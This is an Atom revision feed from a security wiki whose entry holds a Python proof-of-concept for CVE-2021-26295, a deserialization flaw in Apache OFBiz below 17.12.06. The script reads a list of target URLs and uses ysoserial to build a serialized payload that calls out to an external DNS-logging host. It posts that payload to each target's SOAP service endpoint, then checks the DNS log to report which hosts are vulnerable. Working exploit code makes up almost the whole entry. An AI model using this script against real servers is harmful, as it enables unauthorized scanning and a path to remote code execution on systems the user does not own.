<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%2Ffr</id>
	<title>CVE-2021-26295 Apache OFBiz RMI反序列化漏洞/fr - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%2Ffr"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/fr&amp;action=history"/>
	<updated>2026-04-04T13:45:34Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/fr&amp;diff=922&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;== Impact de la vulnérabilité ==&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-26295_Apache_OFBiz_RMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/fr&amp;diff=922&amp;oldid=prev"/>
		<updated>2021-04-03T02:40:07Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;== Impact de la vulnérabilité ==&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
== Impact de la vulnérabilité ==&lt;br /&gt;
&lt;br /&gt;
Apache OFBiz &amp;lt; 17.12.06&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#coding:utf-8&lt;br /&gt;
import binascii&lt;br /&gt;
import os&lt;br /&gt;
import requests&lt;br /&gt;
import urllib3&lt;br /&gt;
import uuid&lt;br /&gt;
urllib3.disable_warnings()&lt;br /&gt;
def main():&lt;br /&gt;
    id = requests.get(&amp;quot;https://dns.xn--9tr.com/new_gen&amp;quot;).text.split(&amp;quot;.&amp;quot;)[0]&lt;br /&gt;
    if(not os.path.exists(&amp;quot;target.txt&amp;quot;)):&lt;br /&gt;
        exit(&amp;quot;put url in target.txt! &amp;quot;)&lt;br /&gt;
    if(not os.path.exists(&amp;quot;ysoserial.jar&amp;quot;)):&lt;br /&gt;
        exit(&amp;quot;where is ysoserial.jar?&amp;quot;)&lt;br /&gt;
    with open(&amp;quot;target.txt&amp;quot;)as f:&lt;br /&gt;
        urls = f.readlines()&lt;br /&gt;
    for url in urls:&lt;br /&gt;
        url = url.strip()&lt;br /&gt;
        uid = uuid.uuid1().hex&lt;br /&gt;
        cmd = &amp;quot;java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk &amp;gt; tmp&amp;quot;.format(uid,id)&lt;br /&gt;
        r = os.popen(cmd)   &lt;br /&gt;
        r.close()  &lt;br /&gt;
        with open(&amp;quot;tmp&amp;quot;,'rb') as f:&lt;br /&gt;
            payload = binascii.hexlify(f.read())&lt;br /&gt;
        data = '''&lt;br /&gt;
        &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
            &amp;lt;soapenv:Header/&amp;gt;&lt;br /&gt;
            &amp;lt;soapenv:Body&amp;gt;&lt;br /&gt;
            &amp;lt;ser&amp;gt;&lt;br /&gt;
        &amp;lt;map-HashMap&amp;gt;&lt;br /&gt;
            &amp;lt;map-Entry&amp;gt;&lt;br /&gt;
                &amp;lt;map-Key&amp;gt;&lt;br /&gt;
                    &amp;lt;cus-obj&amp;gt;{0}&amp;lt;/cus-obj&amp;gt;&lt;br /&gt;
                &amp;lt;/map-Key&amp;gt;&lt;br /&gt;
                &amp;lt;map-Value&amp;gt;&lt;br /&gt;
                    &amp;lt;std-String value=&amp;quot;http://baidu.com&amp;quot;/&amp;gt;&lt;br /&gt;
                &amp;lt;/map-Value&amp;gt;&lt;br /&gt;
            &amp;lt;/map-Entry&amp;gt;&lt;br /&gt;
        &amp;lt;/map-HashMap&amp;gt;&lt;br /&gt;
            &amp;lt;/ser&amp;gt;&lt;br /&gt;
            &amp;lt;/soapenv:Body&amp;gt;&lt;br /&gt;
            &amp;lt;/soapenv:Envelope&amp;gt;&lt;br /&gt;
            '''.format(payload.decode())&lt;br /&gt;
        headers = {&lt;br /&gt;
            &amp;quot;user-agent&amp;quot;:&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36&amp;quot;&lt;br /&gt;
        }&lt;br /&gt;
        url = url+&amp;quot;/webtools/control/SOAPService&amp;quot;&lt;br /&gt;
        try:&lt;br /&gt;
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)&lt;br /&gt;
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)&lt;br /&gt;
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)&lt;br /&gt;
        except:&lt;br /&gt;
            pass&lt;br /&gt;
        dnslogresurl = &amp;quot;https://dns.xn--9tr.com/&amp;quot;+id&lt;br /&gt;
        if(uid in requests.get(dnslogresurl).text):&lt;br /&gt;
            print(&amp;quot;[+] {0} 漏洞存在&amp;quot;.format(url))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;[-] {0} 漏洞不存在&amp;quot;.format(url))&lt;br /&gt;
    print(&amp;quot;[+] 请到 {0} 查看结果&amp;quot;.format(dnslogresurl))&lt;br /&gt;
&lt;br /&gt;
if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>